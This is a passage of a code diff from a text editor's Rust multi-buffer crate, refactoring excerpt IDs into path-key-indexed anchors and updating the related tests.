.iter() + .find(|reference_excerpt| reference_excerpt.range == excerpt_range.context) + .expect("corresponding excerpt should exist in reference multibuffer"); } assert_consistent_line_numbers(&snapshot); @@ -3409,6 +4074,15 @@ fn check_multibuffer( ); } + let actual_anchor_offsets = anchors_to_check + .into_iter() + .map(|anchor| anchor.to_offset(&snapshot)) + .collect::>(); + assert_eq!( + actual_anchor_offsets, expected_anchor_offsets, + "buffer anchor resolves to wrong offset" + ); + for _ in 0..10 { let end_ix = text_rope.clip_offset(rng.random_range(0..=text_rope.len()), Bias::Right); assert_eq!( @@ -3486,8 +4160,8 @@ fn test_history(cx: &mut App) { buf }); let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); - multibuffer.update(cx, |this, _| { - this.set_group_interval(group_interval); + multibuffer.update(cx, |this, cx| { + this.set_group_interval(group_interval, cx); }); multibuffer.update(cx, |multibuffer, cx| { multibuffer.set_excerpts_for_path( @@ -3533,8 +4207,8 @@ fn test_history(cx: &mut App) { assert_eq!( multibuffer.edited_ranges_for_transaction(transaction_1, cx), &[ - Point::new(0, 0)..Point::new(0, 2), - Point::new(1, 0)..Point::new(1, 2) + MultiBufferOffset(0)..MultiBufferOffset(2), + MultiBufferOffset(7)..MultiBufferOffset(9), ] ); @@ -3750,7 +4424,6 @@ async fn test_summaries_for_anchors(cx: &mut TestAppContext) { }); cx.run_until_parked(); - let mut ids = vec![]; let multibuffer = cx.new(|cx| { let mut multibuffer = MultiBuffer::new(Capability::ReadWrite); multibuffer.set_all_diff_hunks_expanded(cx); @@ -3770,7 +4443,6 @@ async fn test_summaries_for_anchors(cx: &mut TestAppContext) { ); multibuffer.add_diff(diff_1.clone(), cx); multibuffer.add_diff(diff_2.clone(), cx); - ids = multibuffer.excerpt_ids(); multibuffer }); @@ -3794,11 +4466,21 @@ async fn test_summaries_for_anchors(cx: &mut TestAppContext) { ), ); - let anchor_1 = Anchor::in_buffer(ids[0], text::Anchor::MIN); + let anchor_1 = multibuffer.read_with(cx, |multibuffer, cx| { + multibuffer + .snapshot(cx) + .anchor_in_excerpt(text::Anchor::min_for_buffer(buffer_1.read(cx).remote_id())) + .unwrap() + }); let point_1 = snapshot.summaries_for_anchors::([&anchor_1])[0]; assert_eq!(point_1, Point::new(0, 0)); - let anchor_2 = Anchor::in_buffer(ids[1], text::Anchor::MIN); + let anchor_2 = multibuffer.read_with(cx, |multibuffer, cx| { + multibuffer + .snapshot(cx) + .anchor_in_excerpt(text::Anchor::min_for_buffer(buffer_2.read(cx).remote_id())) + .unwrap() + }); let point_2 = snapshot.summaries_for_anchors::([&anchor_2])[0]; assert_eq!(point_2, Point::new(3, 0)); } @@ -3824,7 +4506,7 @@ async fn test_trailing_deletion_without_newline(cx: &mut TestAppContext) { cx, ); multibuffer.add_diff(diff_1.clone(), cx); - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); multibuffer }); @@ -3857,7 +4539,7 @@ async fn test_trailing_deletion_without_newline(cx: &mut TestAppContext) { let (_, translated_offset) = snapshot.point_to_buffer_offset(Point::new(2, 0)).unwrap(); assert_eq!(translated_offset.0, "one\n".len()); - let (_, translated_point, _) = snapshot.point_to_buffer_point(Point::new(2, 0)).unwrap(); + let (_, translated_point) = snapshot.point_to_buffer_point(Point::new(2, 0)).unwrap(); assert_eq!(translated_point, Point::new(1, 0)); // The same, for an excerpt that's not at the end of the multibuffer. @@ -3900,7 +4582,7 @@ async fn test_trailing_deletion_without_newline(cx: &mut TestAppContext) { let (buffer, translated_offset) = snapshot.point_to_buffer_offset(Point::new(2, 0)).unwrap(); assert_eq!(buffer.remote_id(), buffer_1_id); assert_eq!(translated_offset.0, "one\n".len()); - let (buffer, translated_point, _) = snapshot.point_to_buffer_point(Point::new(2, 0)).unwrap(); + let (buffer, translated_point) = snapshot.point_to_buffer_point(Point::new(2, 0)).unwrap(); assert_eq!(buffer.remote_id(), buffer_1_id); assert_eq!(translated_point, Point::new(1, 0)); } @@ -3940,6 +4622,7 @@ fn format_diff( }; let expand = info .expand_info + .as_ref() .map(|expand_info| match expand_info.direction { ExpandExcerptDirection::Up => " [↑]", ExpandExcerptDirection::Down => " [↓]", @@ -4283,9 +4966,15 @@ fn assert_excerpts_match( ) { let mut output = String::new(); multibuffer.read_with(cx, |multibuffer, cx| { - for (_, buffer, range) in multibuffer.snapshot(cx).excerpts() { + let snapshot = multibuffer.snapshot(cx); + for excerpt in multibuffer.snapshot(cx).excerpts() { output.push_str("-----\n"); - output.extend(buffer.text_for_range(range.context)); + output.extend( + snapshot + .buffer_for_id(excerpt.context.start.buffer_id) + .unwrap() + .text_for_range(excerpt.context), + ); if !output.ends_with('\n') { output.push('\n'); } @@ -4498,14 +5187,14 @@ fn assert_position_translation(snapshot: &MultiBufferSnapshot) { if let Some((buffer, offset)) = snapshot.point_to_buffer_offset(snapshot.max_point()) { assert!(offset.0 <= buffer.len()); } - if let Some((buffer, point, _)) = snapshot.point_to_buffer_point(snapshot.max_point()) { + if let Some((buffer, point)) = snapshot.point_to_buffer_point(snapshot.max_point()) { assert!(point <= buffer.max_point()); } } fn assert_line_indents(snapshot: &MultiBufferSnapshot) { let max_row = snapshot.max_point().row; - let buffer_id = snapshot.excerpts().next().unwrap().1.remote_id(); + let buffer_id = snapshot.excerpts().next().unwrap().context.start.buffer_id; let text = text::Buffer::new(ReplicaId::LOCAL, buffer_id, snapshot.text()); let mut line_indents = text .line_indents_in_row_range(0..max_row + 1) @@ -4693,7 +5382,8 @@ fn test_random_chunk_bitmaps_with_diffs(cx: &mut App, mut rng: StdRng) { let mut diffs = Vec::new(); multibuffer.update(cx, |multibuffer, cx| { - for buffer_id in multibuffer.excerpt_buffer_ids() { + let snapshot = multibuffer.snapshot(cx); + for buffer_id in snapshot.all_buffer_ids() { if rng.random_bool(0.7) { if let Some(buffer_handle) = multibuffer.buffer(buffer_id) { let buffer_text = buffer_handle.read(cx).text(); @@ -4854,7 +5544,7 @@ fn collect_word_diffs( }); multibuffer.update(cx, |multibuffer, cx| { - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); let snapshot = multibuffer.read_with(cx, |multibuffer, cx| multibuffer.snapshot(cx)); @@ -4969,38 +5659,40 @@ fn test_excerpts_containment_functions(cx: &mut App) { let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); - let (excerpt_1_id, excerpt_2_id, excerpt_3_id) = multibuffer.update(cx, |multibuffer, cx| { - multibuffer.set_excerpts_for_path( - PathKey::sorted(0), - buffer_1.clone(), - [Point::new(0, 0)..Point::new(1, 3)], - 0, - cx, - ); + let (excerpt_1_info, excerpt_2_info, excerpt_3_info) = + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + PathKey::sorted(0), + buffer_1.clone(), + [Point::new(0, 0)..Point::new(1, 3)], + 0, + cx, + ); - multibuffer.set_excerpts_for_path( - PathKey::sorted(1), - buffer_2.clone(), - [Point::new(0, 0)..Point::new(1, 3)], - 0, - cx, - ); + multibuffer.set_excerpts_for_path( + PathKey::sorted(1), + buffer_2.clone(), + [Point::new(0, 0)..Point::new(1, 3)], + 0, + cx, + ); - multibuffer.set_excerpts_for_path( - PathKey::sorted(2), - buffer_3.clone(), - [Point::new(0, 0)..Point::new(0, 3)], - 0, - cx, - ); + multibuffer.set_excerpts_for_path( + PathKey::sorted(2), + buffer_3.clone(), + [Point::new(0, 0)..Point::new(0, 3)], + 0, + cx, + ); - let mut ids = multibuffer.excerpt_ids().into_iter(); - ( - ids.next().unwrap(), - ids.next().unwrap(), - ids.next().unwrap(), - ) - }); + let snapshot = multibuffer.snapshot(cx); + let mut excerpts = snapshot.excerpts(); + ( + excerpts.next().unwrap(), + excerpts.next().unwrap(), + excerpts.next().unwrap(), + ) + }); let snapshot = multibuffer.read(cx).snapshot(cx); @@ -5018,24 +5710,24 @@ fn test_excerpts_containment_functions(cx: &mut App) { let excerpts: Vec<_> = snapshot.excerpts_for_range(p00..p00).collect(); assert_eq!(excerpts.len(), 1); - assert_eq!(excerpts[0].id, excerpt_1_id); + assert_eq!(excerpts[0].range, excerpt_1_info); // Cursor at very end of excerpt 3 let excerpts: Vec<_> = snapshot.excerpts_for_range(p43..p43).collect(); assert_eq!(excerpts.len(), 1); - assert_eq!(excerpts[0].id, excerpt_3_id); + assert_eq!(excerpts[0].range, excerpt_3_info); let excerpts: Vec<_> = snapshot.excerpts_for_range(p00..p23).collect(); assert_eq!(excerpts.len(), 2); - assert_eq!(excerpts[0].id, excerpt_1_id); - assert_eq!(excerpts[1].id, excerpt_2_id); + assert_eq!(excerpts[0].range, excerpt_1_info); + assert_eq!(excerpts[1].range, excerpt_2_info); // This range represent an selection with end-point just inside excerpt_2 // Today we only expand the first excerpt, but another interpretation that // we could consider is expanding both here let excerpts: Vec<_> = snapshot.excerpts_for_range(p10..p20).collect(); assert_eq!(excerpts.len(), 1); - assert_eq!(excerpts[0].id, excerpt_1_id); + assert_eq!(excerpts[0].range, excerpt_1_info); //// Test that `excerpts_for_range` and `excerpt_containing` agree for all single offsets (cursor positions) for offset in 0..=snapshot.len().0 { @@ -5047,15 +5739,15 @@ fn test_excerpts_containment_functions(cx: &mut App) { "Expected exactly one excerpt for offset {offset}", ); - let excerpt_containing = snapshot.excerpt_containing(offset..offset); - assert!( - excerpt_containing.is_some(), - "Expected excerpt_containing to find excerpt for offset {offset}", - ); + let (_, excerpt_containing) = + snapshot + .excerpt_containing(offset..offset) + .unwrap_or_else(|| { + panic!("Expected excerpt_containing to find excerpt for offset {offset}") + }); assert_eq!( - excerpts_for_range[0].id, - excerpt_containing.unwrap().id(), + excerpts_for_range[0].range, excerpt_containing, "excerpts_for_range and excerpt_containing should agree for offset {offset}", ); } @@ -5063,9 +5755,8 @@ fn test_excerpts_containment_functions(cx: &mut App) { //// Test `excerpt_containing` behavior with ranges: // Ranges intersecting a single-excerpt - let containing = snapshot.excerpt_containing(p00..p13); - assert!(containing.is_some()); - assert_eq!(containing.unwrap().id(), excerpt_1_id); + let (_, containing) = snapshot.excerpt_containing(p00..p13).unwrap(); + assert_eq!(containing, excerpt_1_info); // Ranges intersecting multiple excerpts (should return None) let containing = snapshot.excerpt_containing(p20..p40); @@ -5076,14 +5767,12 @@ fn test_excerpts_containment_functions(cx: &mut App) { } #[gpui::test] -fn test_range_to_buffer_ranges_with_range_bounds(cx: &mut App) { - use std::ops::Bound; - +fn test_range_to_buffer_ranges(cx: &mut App) { let buffer_1 = cx.new(|cx| Buffer::local("aaa\nbbb", cx)); let buffer_2 = cx.new(|cx| Buffer::local("ccc", cx)); let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); - let (excerpt_1_id, excerpt_2_id) = multibuffer.update(cx, |multibuffer, cx| { + multibuffer.update(cx, |multibuffer, cx| { multibuffer.set_excerpts_for_path( PathKey::sorted(0), buffer_1.clone(), @@ -5099,10 +5788,6 @@ fn test_range_to_buffer_ranges_with_range_bounds(cx: &mut App) { 0, cx, ); - - let excerpt_ids = multibuffer.excerpt_ids(); - - (excerpt_ids[0], excerpt_ids[1]) }); let snapshot = multibuffer.read(cx).snapshot(cx); @@ -5116,41 +5801,15 @@ fn test_range_to_buffer_ranges_with_range_bounds(cx: &mut App) { 1, "Half-open range ending at excerpt start should EXCLUDE that excerpt" ); - assert_eq!(ranges_half_open[0].2, excerpt_1_id); - - let ranges_inclusive = snapshot.range_to_buffer_ranges(Point::zero()..=excerpt_2_start); - assert_eq!( - ranges_inclusive.len(), - 2, - "Inclusive range ending at excerpt start should INCLUDE that excerpt" - ); - assert_eq!(ranges_inclusive[0].2, excerpt_1_id); - assert_eq!(ranges_inclusive[1].2, excerpt_2_id); - - let ranges_unbounded = - snapshot.range_to_buffer_ranges((Bound::Included(Point::zero()), Bound::Unbounded)); - assert_eq!( - ranges_unbounded.len(), - 2, - "Unbounded end should include all excerpts" - ); - assert_eq!(ranges_unbounded[0].2, excerpt_1_id); - assert_eq!(ranges_unbounded[1].2, excerpt_2_id); - - let ranges_excluded_end = snapshot.range_to_buffer_ranges(( - Bound::Included(Point::zero()), - Bound::Excluded(excerpt_2_start), - )); + assert_eq!(ranges_half_open[0].1, BufferOffset(0)..BufferOffset(7)); assert_eq!( - ranges_excluded_end.len(), - 1, - "Excluded end bound should exclude excerpt starting at that point" + ranges_half_open[0].0.remote_id(), + buffer_1.read(cx).remote_id() ); - assert_eq!(ranges_excluded_end[0].2, excerpt_1_id); let buffer_empty = cx.new(|cx| Buffer::local("", cx)); let multibuffer_trailing_empty = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); - let (te_excerpt_1_id, te_excerpt_2_id) = + let (_te_excerpt_1_info, _te_excerpt_2_info) = multibuffer_trailing_empty.update(cx, |multibuffer, cx| { multibuffer.set_excerpts_for_path( PathKey::sorted(0), @@ -5168,8 +5827,9 @@ fn test_range_to_buffer_ranges_with_range_bounds(cx: &mut App) { cx, ); - let excerpt_ids = multibuffer.excerpt_ids(); - (excerpt_ids[0], excerpt_ids[1]) + let snapshot = multibuffer.snapshot(cx); + let mut infos = snapshot.excerpts(); + (infos.next().unwrap(), infos.next().unwrap()) }); let snapshot_trailing = multibuffer_trailing_empty.read(cx).snapshot(cx); @@ -5180,29 +5840,130 @@ fn test_range_to_buffer_ranges_with_range_bounds(cx: &mut App) { let ranges_half_open_max = snapshot_trailing.range_to_buffer_ranges(Point::zero()..max_point); assert_eq!( ranges_half_open_max.len(), - 1, - "Half-open range to max_point should EXCLUDE trailing empty excerpt at max_point" + 2, + "Should include trailing empty excerpts" + ); + assert_eq!(ranges_half_open_max[1].1, BufferOffset(0)..BufferOffset(0)); +} + +#[gpui::test] +async fn test_buffer_range_to_excerpt_ranges(cx: &mut TestAppContext) { + let base_text = indoc!( + " + aaa + bbb + ccc + ddd + eee + ppp + qqq + rrr + fff + ggg + hhh + " + ); + let text = indoc!( + " + aaa + BBB + ddd + eee + ppp + qqq + rrr + FFF + ggg + hhh + " + ); + + let buffer = cx.new(|cx| Buffer::local(text, cx)); + let diff = cx + .new(|cx| BufferDiff::new_with_base_text(base_text, &buffer.read(cx).text_snapshot(), cx)); + cx.run_until_parked(); + + let multibuffer = cx.new(|cx| { + let mut multibuffer = MultiBuffer::new(Capability::ReadWrite); + multibuffer.set_excerpts_for_path( + PathKey::sorted(0), + buffer.clone(), + [ + Point::new(0, 0)..Point::new(3, 3), + Point::new(7, 0)..Point::new(9, 3), + ], + 0, + cx, + ); + multibuffer.add_diff(diff.clone(), cx); + multibuffer + }); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); + }); + cx.run_until_parked(); + + let snapshot = multibuffer.read_with(cx, |multibuffer, cx| multibuffer.snapshot(cx)); + + let actual_diff = format_diff( + &snapshot.text(), + &snapshot.row_infos(MultiBufferRow(0)).collect::>(), + &Default::default(), + None, + ); + let expected_diff = indoc!( + " + aaa + - bbb + - ccc + + BBB + ddd + eee [\u{2193}] + - fff [\u{2191}] + + FFF + ggg + hhh [\u{2193}]" + ); + pretty_assertions::assert_eq!(actual_diff, expected_diff); + + let buffer_snapshot = buffer.read_with(cx, |buffer, _| buffer.snapshot()); + + let query_spanning_deleted_hunk = buffer_snapshot.anchor_after(Point::new(0, 0)) + ..buffer_snapshot.anchor_before(Point::new(1, 3)); + assert_eq!( + snapshot + .buffer_range_to_excerpt_ranges(query_spanning_deleted_hunk) + .map(|range| range.to_point(&snapshot)) + .collect::>(), + vec![ + Point::new(0, 0)..Point::new(1, 0), + Point::new(3, 0)..Point::new(3, 3), + ], ); - assert_eq!(ranges_half_open_max[0].2, te_excerpt_1_id); - let ranges_inclusive_max = snapshot_trailing.range_to_buffer_ranges(Point::zero()..=max_point); + let query_within_contiguous_main_buffer = buffer_snapshot.anchor_after(Point::new(1, 0)) + ..buffer_snapshot.anchor_before(Point::new(2, 3)); assert_eq!( - ranges_inclusive_max.len(), - 2, - "Inclusive range to max_point should INCLUDE trailing empty excerpt" + snapshot + .buffer_range_to_excerpt_ranges(query_within_contiguous_main_buffer) + .map(|range| range.to_point(&snapshot)) + .collect::>(), + vec![Point::new(3, 0)..Point::new(4, 3)], ); - assert_eq!(ranges_inclusive_max[0].2, te_excerpt_1_id); - assert_eq!(ranges_inclusive_max[1].2, te_excerpt_2_id); - let ranges_unbounded_trailing = snapshot_trailing - .range_to_buffer_ranges((Bound::Included(Point::zero()), Bound::Unbounded)); + let query_spanning_both_excerpts = buffer_snapshot.anchor_after(Point::new(2, 0)) + ..buffer_snapshot.anchor_before(Point::new(8, 3)); assert_eq!( - ranges_unbounded_trailing.len(), - 2, - "Unbounded end should include trailing empty excerpt" + snapshot + .buffer_range_to_excerpt_ranges(query_spanning_both_excerpts) + .map(|range| range.to_point(&snapshot)) + .collect::>(), + vec![ + Point::new(4, 0)..Point::new(5, 3), + Point::new(7, 0)..Point::new(8, 3), + ], ); - assert_eq!(ranges_unbounded_trailing[0].2, te_excerpt_1_id); - assert_eq!(ranges_unbounded_trailing[1].2, te_excerpt_2_id); } #[gpui::test] @@ -5248,17 +6009,14 @@ fn test_cannot_seek_backward_after_excerpt_replacement(cx: &mut TestAppContext) let (anchor_in_e_b2, anchor_in_e_b3) = multibuffer.read_with(cx, |multibuffer, cx| { let snapshot = multibuffer.snapshot(cx); - let excerpt_ids: Vec = snapshot.excerpts().map(|(id, _, _)| id).collect(); - assert_eq!(excerpt_ids.len(), 4, "expected 4 excerpts (3×B + 1×C)"); + let excerpt_infos = snapshot.excerpts().collect::>(); + assert_eq!(excerpt_infos.len(), 4, "expected 4 excerpts (3×B + 1×C)"); - let e_b2_id = excerpt_ids[1]; - let e_b3_id = excerpt_ids[2]; + let e_b2_info = excerpt_infos[1].clone(); + let e_b3_info = excerpt_infos[2].clone(); - let e_b2 = snapshot.excerpt(e_b2_id).expect("E_B2 should exist"); - let e_b3 = snapshot.excerpt(e_b3_id).expect("E_B3 should exist"); - - let anchor_b2 = Anchor::in_buffer(e_b2_id, e_b2.range.context.start); - let anchor_b3 = Anchor::in_buffer(e_b3_id, e_b3.range.context.start); + let anchor_b2 = snapshot.anchor_in_excerpt(e_b2_info.context.start).unwrap(); + let anchor_b3 = snapshot.anchor_in_excerpt(e_b3_info.context.start).unwrap(); (anchor_b2, anchor_b3) }); @@ -5287,3 +6045,104 @@ fn test_cannot_seek_backward_after_excerpt_replacement(cx: &mut TestAppContext) snapshot.summaries_for_anchors::(&[anchor_in_e_b2, anchor_in_e_b3]); }); } + +#[gpui::test] +fn test_resolving_max_anchor_for_buffer(cx: &mut TestAppContext) { + let dock_base_text = indoc! {" + 0 + 1 + 2 + 3 + 4 + 5 + 6 + 7 + 8 + 9 + 10 + 11 + 12 + "}; + + let dock_text = indoc! {" + 0 + 4 + 5 + 6 + 10 + 11 + 12 + "}; + + let dock_buffer = cx.new(|cx| Buffer::local(dock_text, cx)); + let diff = cx.new(|cx| { + BufferDiff::new_with_base_text(dock_base_text, &dock_buffer.read(cx).snapshot(), cx) + }); + + let workspace_text = "second buffer\n"; + let workspace_buffer = cx.new(|cx| Buffer::local(workspace_text, cx)); + + let dock_path = PathKey::with_sort_prefix(0, rel_path("").into_arc()); + let workspace_path = PathKey::with_sort_prefix(1, rel_path("").into_arc()); + + let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpt_ranges_for_path( + dock_path, + dock_buffer.clone(), + &dock_buffer.read(cx).snapshot(), + vec![ + ExcerptRange::new(Point::zero()..Point::new(1, 1)), + ExcerptRange::new(Point::new(3, 0)..Point::new(4, 2)), + ], + cx, + ); + multibuffer.set_excerpt_ranges_for_path( + workspace_path, + workspace_buffer.clone(), + &workspace_buffer.read(cx).snapshot(), + vec![ExcerptRange::new( + Point::zero()..workspace_buffer.read(cx).max_point(), + )], + cx, + ); + multibuffer.add_diff(diff, cx); + multibuffer.set_all_diff_hunks_expanded(cx); + }); + + let snapshot = multibuffer.update(cx, |multibuffer, cx| multibuffer.snapshot(cx)); + let diff = format_diff( + &snapshot.text(), + &snapshot.row_infos(MultiBufferRow(0)).collect::>(), + &Default::default(), + None, + ); + assert_eq!( + diff, + indoc! {" + 0 + - 1 + - 2 + - 3 + 4 [↓] + 6 [↑] + - 7 + - 8 + - 9 + 10 [↓] + second buffer + "} + ); + + multibuffer.update(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + let point = snapshot + .anchor_in_buffer(text::Anchor::max_for_buffer( + dock_buffer.read(cx).remote_id(), + )) + .unwrap() + .to_point(&snapshot); + assert_eq!(point, Point::new(10, 0)); + }) +} diff --git a/crates/multi_buffer/src/path_key.rs b/crates/multi_buffer/src/path_key.rs index 09d17d7b7fe2e9e666ba6c5777216c9c8ba4dea0..5c2123d0f9c1b09c16fd99531973df81c45140f7 100644 --- a/crates/multi_buffer/src/path_key.rs +++ b/crates/multi_buffer/src/path_key.rs @@ -1,24 +1,20 @@ -use std::{mem, ops::Range, sync::Arc}; +use std::{ops::Range, rc::Rc, sync::Arc}; -use collections::HashSet; use gpui::{App, AppContext, Context, Entity}; use itertools::Itertools; use language::{Buffer, BufferSnapshot}; use rope::Point; -use text::{Bias, OffsetRangeExt, locator::Locator}; -use util::{post_inc, rel_path::RelPath}; +use sum_tree::{Dimensions, SumTree}; +use text::{Bias, BufferId, Edit, OffsetRangeExt, Patch}; +use util::rel_path::RelPath; use ztracing::instrument; use crate::{ - Anchor, ExcerptId, ExcerptRange, ExpandExcerptDirection, MultiBuffer, build_excerpt_ranges, + Anchor, BufferState, BufferStateSnapshot, DiffChangeKind, Event, Excerpt, ExcerptOffset, + ExcerptRange, ExcerptSummary, ExpandExcerptDirection, MultiBuffer, MultiBufferOffset, + PathKeyIndex, build_excerpt_ranges, remove_diff_state, }; -#[derive(Debug, Clone)] -pub struct PathExcerptInsertResult { - pub excerpt_ids: Vec, - pub added_new_excerpt: bool, -} - #[derive(PartialEq, Eq, Ord, PartialOrd, Clone, Hash, Debug)] pub struct PathKey { // Used by the derived PartialOrd & Ord @@ -27,6 +23,13 @@ pub struct PathKey { } impl PathKey { + pub fn min() -> Self { + Self { + sort_prefix: None, + path: RelPath::empty().into_arc(), + } + } + pub fn sorted(sort_prefix: u64) -> Self { Self { sort_prefix: Some(sort_prefix), @@ -55,41 +58,17 @@ impl PathKey { } impl MultiBuffer { - pub fn paths(&self) -> impl Iterator + '_ { - self.excerpts_by_path.keys() - } - - pub fn excerpts_for_path(&self, path: &PathKey) -> impl '_ + Iterator { - self.excerpts_by_path - .get(path) - .map(|excerpts| excerpts.as_slice()) - .unwrap_or_default() - .iter() - .copied() - } - - pub fn path_for_excerpt(&self, excerpt: ExcerptId) -> Option { - self.paths_by_excerpt.get(&excerpt).cloned() - } - - pub fn remove_excerpts_for_path(&mut self, path: PathKey, cx: &mut Context) { - if let Some(to_remove) = self.excerpts_by_path.remove(&path) { - self.remove_excerpts(to_remove, cx) - } - } - pub fn buffer_for_path(&self, path: &PathKey, cx: &App) -> Option> { - let excerpt_id = self.excerpts_by_path.get(path)?.first()?; - let snapshot = self.read(cx); - let excerpt = snapshot.excerpt(*excerpt_id)?; - self.buffer(excerpt.buffer_id) + let snapshot = self.snapshot(cx); + let excerpt = snapshot.excerpts_for_path(path).next()?; + self.buffer(excerpt.context.start.buffer_id) } pub fn location_for_path(&self, path: &PathKey, cx: &App) -> Option { - let excerpt_id = self.excerpts_by_path.get(path)?.first()?; - let snapshot = self.read(cx); - let excerpt = snapshot.excerpt(*excerpt_id)?; - Some(Anchor::in_buffer(excerpt.id, excerpt.range.context.start)) + let snapshot = self.snapshot(cx); + let excerpt = snapshot.excerpts_for_path(path).next()?; + let path_key_index = snapshot.path_key_index_for_buffer(excerpt.context.start.buffer_id)?; + Some(Anchor::in_buffer(path_key_index, excerpt.context.start)) } pub fn set_excerpts_for_buffer( @@ -98,12 +77,14 @@ impl MultiBuffer { ranges: impl IntoIterator>, context_line_count: u32, cx: &mut Context, - ) -> (Vec>, bool) { + ) -> bool { let path = PathKey::for_buffer(&buffer, cx); self.set_excerpts_for_path(path, buffer, ranges, context_line_count, cx) } /// Sets excerpts, returns `true` if at least one new excerpt was added. + /// + /// Any existing excerpts for this buffer or this path will be replaced by the provided ranges. #[instrument(skip_all)] pub fn set_excerpts_for_path( &mut self, @@ -112,20 +93,83 @@ impl MultiBuffer { ranges: impl IntoIterator>, context_line_count: u32, cx: &mut Context, - ) -> (Vec>, bool) { + ) -> bool { let buffer_snapshot = buffer.read(cx).snapshot(); + let ranges: Vec<_> = ranges.into_iter().collect(); let excerpt_ranges = build_excerpt_ranges(ranges, context_line_count, &buffer_snapshot); - let (new, counts) = Self::merge_excerpt_ranges(&excerpt_ranges); - self.set_merged_excerpt_ranges_for_path( - path, - buffer, - excerpt_ranges, + let merged = Self::merge_excerpt_ranges(&excerpt_ranges); + let (inserted, _path_key_index) = + self.set_merged_excerpt_ranges_for_path(path, buffer, &buffer_snapshot, merged, cx); + inserted + } + + /// Like [`Self::set_excerpts_for_path`], but expands the provided ranges to cover any overlapping existing excerpts + /// for the same buffer and path. + /// + /// Existing excerpts that do not overlap any of the provided ranges are discarded. + pub fn update_excerpts_for_path( + &mut self, + path: PathKey, + buffer: Entity, + ranges: impl IntoIterator>, + context_line_count: u32, + cx: &mut Context, + ) -> bool { + let buffer_snapshot = buffer.read(cx).snapshot(); + let ranges: Vec<_> = ranges.into_iter().collect(); + let excerpt_ranges = build_excerpt_ranges(ranges, context_line_count, &buffer_snapshot); + let merged = self.merge_new_with_existing_excerpt_ranges( + &path, &buffer_snapshot, - new, - counts, + excerpt_ranges, cx, - ) + ); + + let (inserted, _path_key_index) = + self.set_merged_excerpt_ranges_for_path(path, buffer, &buffer_snapshot, merged, cx); + inserted + } + + pub fn merge_new_with_existing_excerpt_ranges( + &self, + path: &PathKey, + buffer_snapshot: &BufferSnapshot, + mut excerpt_ranges: Vec>, + cx: &App, + ) -> Vec> { + let multibuffer_snapshot = self.snapshot(cx); + + if multibuffer_snapshot.path_for_buffer(buffer_snapshot.remote_id()) == Some(path) { + excerpt_ranges.sort_by_key(|range| range.context.start); + let mut combined_ranges = Vec::new(); + let mut new_ranges = excerpt_ranges.into_iter().peekable(); + for existing_range in + multibuffer_snapshot.excerpts_for_buffer(buffer_snapshot.remote_id()) + { + let existing_range = ExcerptRange { + context: existing_range.context.to_point(buffer_snapshot), + primary: existing_range.primary.to_point(buffer_snapshot), + }; + while let Some(new_range) = new_ranges.peek() + && new_range.context.end < existing_range.context.start + { + combined_ranges.push(new_range.clone()); + new_ranges.next(); + } + + if let Some(new_range) = new_ranges.peek() + && new_range.context.start <= existing_range.context.end + { + combined_ranges.push(existing_range) + } + } + combined_ranges.extend(new_ranges); + excerpt_ranges = combined_ranges; + } + + excerpt_ranges.sort_by_key(|range| range.context.start); + Self::merge_excerpt_ranges(&excerpt_ranges) } pub fn set_excerpt_ranges_for_path( @@ -135,17 +179,11 @@ impl MultiBuffer { buffer_snapshot: &BufferSnapshot, excerpt_ranges: Vec>, cx: &mut Context, - ) -> (Vec>, bool) { - let (new, counts) = Self::merge_excerpt_ranges(&excerpt_ranges); - self.set_merged_excerpt_ranges_for_path( - path, - buffer, - excerpt_ranges, - buffer_snapshot, - new, - counts, - cx, - ) + ) -> bool { + let merged = Self::merge_excerpt_ranges(&excerpt_ranges); + let (inserted, _path_key_index) = + self.set_merged_excerpt_ranges_for_path(path, buffer, buffer_snapshot, merged, cx); + inserted } pub fn set_anchored_excerpts_for_path( @@ -161,350 +199,505 @@ impl MultiBuffer { let mut app = cx.to_async(); async move { let snapshot = buffer_snapshot.clone(); - let (excerpt_ranges, new, counts) = app + let (ranges, merged_excerpt_ranges) = app .background_spawn(async move { - let ranges = ranges.into_iter().map(|range| range.to_point(&snapshot)); + let point_ranges = ranges.iter().map(|range| range.to_point(&snapshot)); let excerpt_ranges = - build_excerpt_ranges(ranges, context_line_count, &snapshot); - let (new, counts) = Self::merge_excerpt_ranges(&excerpt_ranges); - (excerpt_ranges, new, counts) + build_excerpt_ranges(point_ranges, context_line_count, &snapshot); + let merged = Self::merge_excerpt_ranges(&excerpt_ranges); + (ranges, merged) }) .await; multi_buffer .update(&mut app, move |multi_buffer, cx| { - let (ranges, _) = multi_buffer.set_merged_excerpt_ranges_for_path( + let (_, path_key_index) = multi_buffer.set_merged_excerpt_ranges_for_path( path_key, buffer, - excerpt_ranges, &buffer_snapshot, - new, - counts, + merged_excerpt_ranges, cx, ); ranges + .into_iter() + .map(|range| Anchor::range_in_buffer(path_key_index, range)) + .collect() }) .ok() .unwrap_or_default() } } - pub(super) fn expand_excerpts_with_paths( + pub fn expand_excerpts( &mut self, - ids: impl IntoIterator, + anchors: impl IntoIterator, line_count: u32, direction: ExpandExcerptDirection, cx: &mut Context, ) { - let mut sorted_ids: Vec = ids.into_iter().collect(); - sorted_ids.sort_by(|a, b| { - let path_a = self.paths_by_excerpt.get(a); - let path_b = self.paths_by_excerpt.get(b); - path_a.cmp(&path_b) - }); - let grouped = sorted_ids - .into_iter() - .chunk_by(|id| self.paths_by_excerpt.get(id).cloned()) + if line_count == 0 { + return; + } + + let snapshot = self.snapshot(cx); + let mut sorted_anchors = anchors .into_iter() - .filter_map(|(k, v)| Some((k?, v.into_iter().collect::>()))) + .filter_map(|anchor| anchor.excerpt_anchor()) .collect::>(); - let snapshot = self.snapshot(cx); - - for (path, ids) in grouped.into_iter() { - let 